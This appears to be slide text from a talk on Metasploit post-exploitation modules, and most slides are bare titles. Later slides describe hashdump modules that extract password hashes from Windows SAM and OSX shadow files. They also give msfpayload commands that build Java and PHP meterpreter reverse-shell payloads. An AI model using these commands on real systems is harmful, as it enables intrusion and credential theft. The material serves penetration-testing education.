Documente Academic
Documente Profesional
Documente Cultură
1
Outline
2
Metasploit overview
3
Metasploit Framework architecture
LIBRARIES INTERFACES
Console
TOOLS Rex
CLI
MSF Core
GUI &
Armitage
MODULES
4
Metasploit Framework architecture
LIBRARIES INTERFACES
Console
TOOLS Rex
CLI
MSF Core
GUI &
Armitage
MODULES
5
What are Metasploit modules?
6
Metasploit Framework architecture
LIBRARIES INTERFACES
Console
TOOLS Rex
CLI
MSF Core
GUI &
Armitage
MODULES
Post
Exploit Payload Encoder NOP Auxiliary
7
Back in the day
8
Meterpreter scripts
Post
10
Keeping the good
11
Improving the not-so-good
12
Using post-exploitation modules
13
Three ways to run them
14
Railgun
15
Loot
• Pilfered data
• Can be anything, stored in a file
– Process listing
– Environment variables
• Usually not passwords (use Creds table for that)
16
Awesome Post Modules
• Hashdump
– Similar in function to the hashdump command
– Instead of injecting into lsass, just reads the registry
– Calculates everything necessary to pull hashes directly out of SAM
• There’s an OSX version now!
– Reads /var/db/shadow/hash/<user guid>
– Grabs SHA1, NT, and LM hashes
17
Third-party post-exploitation modules
18
Modules in the works
19
Where to put it…
20
Platform-agnostic payloads
Java
• msfpayload java/meterpreter/reverse_tcp
LHOST=192.168.99.1 X > foo.jar
• msfpayload java/meterpreter/reverse_tcp
LHOST=192.168.99.1 W > foo.war
22
PHP
• msfpayload php/meterpreter_reverse_tcp
LHOST=192.168.99.1 R > foo.php
23
Commercial Feature Highlights
24
Commercial Feature Highlights
Post-exploitation
Modules in
Metasploit
Pro/Express
25
Commercial Feature Highlights
26
Quick demos
Questions?
@egyp7
egypt@metasploit.com